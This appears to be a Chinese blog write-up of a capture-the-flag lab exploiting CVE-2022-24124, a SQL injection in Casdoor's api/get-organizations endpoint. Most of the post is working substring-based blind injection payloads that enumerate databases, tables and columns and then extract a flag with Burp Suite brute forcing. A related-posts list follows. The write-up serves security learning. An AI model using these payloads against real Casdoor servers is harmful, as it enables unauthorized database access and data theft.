CVE-2022-24124

原创 于 2024-11-24 17:38:35 发布 · 1.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

根据提示

访问api/get-organizations

salmap和手工注入都不行,使用substring()

查库,查到有4个库

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select count(schema_name) from information_schema.schemata),1,1) = '4') <> name

第4个数据库第1个字母:c

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select schema_name from information_schema.schemata limit 3,1),1,1) = 'c') <> name

(因为计算机是从0开始的,所以3表示第4个库,

1表示第一个字符,c是测试的字符

下边查表、查列、查数据也是如此)

第4个数据库第2个字母:a

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select schema_name from information_schema.schemata limit% 3,1),1,2) = 'ca') <> name

第4个数据库第3个字母:s

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select schema_name from information_schema.schemata limit 3,1),1,3) = 'cas') <> name

依次类推得出数据库有7位,数据库名为:casdoor

为什么只有4个库,这个库名为7位,查库时的第5个库和第4个库的第8位开始所有字母都报错,由此推出只有7位,下边查表、查列一样

查表,第一个表名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,11) = 'application') <> name

第二个表名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,4) = 'role') <> name

第四个表名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,4) = 'flag') <> name

查列名,第一列名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select column_name from information_schema.columns where table_schema='casdoor'

and table_name='flag' limit 0,1),1,2) = 'id') <> name

第二列名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select column_name from information_schema.columns where table_schema='casdoor'

and table_name='flag' limit 1,1),1,4) = 'flag') <> name

查flag

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select group_concat(flag) from flag),§1§,1) = '§a§') <> name

(红色部分为bp爆破部分)

使用bp抓包

攻击类型选择,集束炸弹-多个paload集合

攻击完后保存一下

保存为表格形式

首先对我们所需要的长度筛选一下

然后把paload1的顺序改为升序,得到flag

复制出来,Flag:flag{73a62ab4-b564-441e-8f6d-3b7806242c02}

diandian~
关注
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
weixin_46801402的博客
11-02 1256
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
casdoor SQL注入(CVE-2022-24124
qq_23003811的博客
07-18 435
Casdoor 是一个基于 OAuth 2.0 / OIDC 的 UI 优先集中认证 / 单点登录 (SSO) 平台,简单点说,就是 Casdoor 可以帮你解决 用户管理 的难题,你无需开发用户登录注册等与用户鉴权相关的一系列功能,只需几个步骤,简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor 1.13.1 之前的查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。2、使用sqlmap跑注入点。
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
08-31 3263
此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
春秋云镜 CVE-2022-24124
qq_22002773的博客
08-10 460
春秋云镜 CVE-2022-24124
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2955
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云境:CVE-2022-24124(Casdoor api get-oraganizations SQL注入)
m0_65712192的博客
07-23 1710
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
CVE-2022-24124复现
giaogiaogioao的博客
11-26 1007
CVE-2022-24124复现
【春秋云境】CVE-2022-24124复现
小高工作室
12-01 1253
【代码】【春秋云境】CVE-2022-24124复现。
【春秋云镜】CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 1341
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
【春秋云境】CVE-2022-28512
m0_49025459的博客
05-06 354
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
CVE-2022-2414】Dogtag_PKI XML实体注入漏洞复现
weixin_37771454的博客
11-29 1179
Dogtag PKI XXE漏洞复现 CVE-2022-2414
【2024最新版】Mysql数据库安装全攻略:图文详解(Windows版本)
码界领航的Cherry Yang的博客
06-23 8410
这里有两个版本的MySQL,mysql-installer-web-community-8.0.37.0.msi是在线安装,需要联网安装,mysql-installer-community-8.0.37.0.msi是下载在本机安装,无需联网,这里我们下载mysql-installer-community-8.0.37.0.msi版本,单击其后的【Download】按钮。在弹出的安装Microsoft Visual C++的对话框中,勾选【我同意许可条款和条件】,单击【安装】按钮。
【2024】Linux漏洞修复合集
slience_me的博客
01-03 5842
2024 Linux漏洞修复合集
春秋云镜(二)
wanan的博客
02-19 593
春秋云镜(二)
Windows CVE-2022-21907漏洞复现
热门推荐
执着
01-20 1万+
测试环境:虚拟机Windows 10 Windows版本:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso 此次CVE的漏洞是由于HTTP.sys的缓冲区溢出从而导致的拒绝服务,蓝屏重启。 微软官方在第一时间修复此漏洞,据微软官方公布的此次漏洞影响范围: Windows Server 2019 (Server Core installation) Windows Server 201..
实战CVE-2022-23131漏洞 | 身份认证绕过
qq_41132792的博客
07-27 1421
Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决方案非常相似。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix 是威胁参与者的高调目标...
Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用
include_voidmain的博客
04-11 8360
0x01 什么是Apache APISIX Dashboard Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。 0x02 漏洞详情 漏洞编号:CVE-2022-24112 影响版本:Apache APISIX < 2.12.1 Apache APIS
【密钥泄漏】CVE-2022-29266 Apache Apisix jwt插件
HBohan的博客
04-29 1122
漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。 漏洞版本 Apache Apisix < 2.13.1 插件开启 在这里给大家演示的是Dashboard页面开启jwt插件。 1、当我们环境搭建完毕后、通过访问http://127
CVE-2022-30525 Zyxel 防火墙远程命令注入漏洞
dust_hk的博客
05-14 5918
摘要 合勤科技(ZyXEL)是国际知名品牌的网络宽带系统及解决方案的供应商,成立于1989年,目前是台湾证交所上市公司(2391),总部设于台湾新竹科学园区。官网:http://www.zyxel.cn。 Zyxel USG FLEX 100(W) 固件版本 5.00 至 5.21 补丁 1、USG FLEX 200 固件版本 5.00 至 5.21 补丁 1、USG FLEX 500 固件版本 5.00 至 5.21 补丁 1、USG FLEX 700 的 CGI 程序中的操作系统命令注入漏洞固件版本
cve-2022-23366
最新发布
12-03
从用户提供的引用内容看,ta之前关注过F5、Redis和SnakeYAML相关的漏洞(CVE-2022-41622/CVE-2022-41800、CVE-2022-0543、CVE-2022-1471),但这次查询的编号2022-23366属于完全不同的产品线。 先确认漏洞基础信息...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值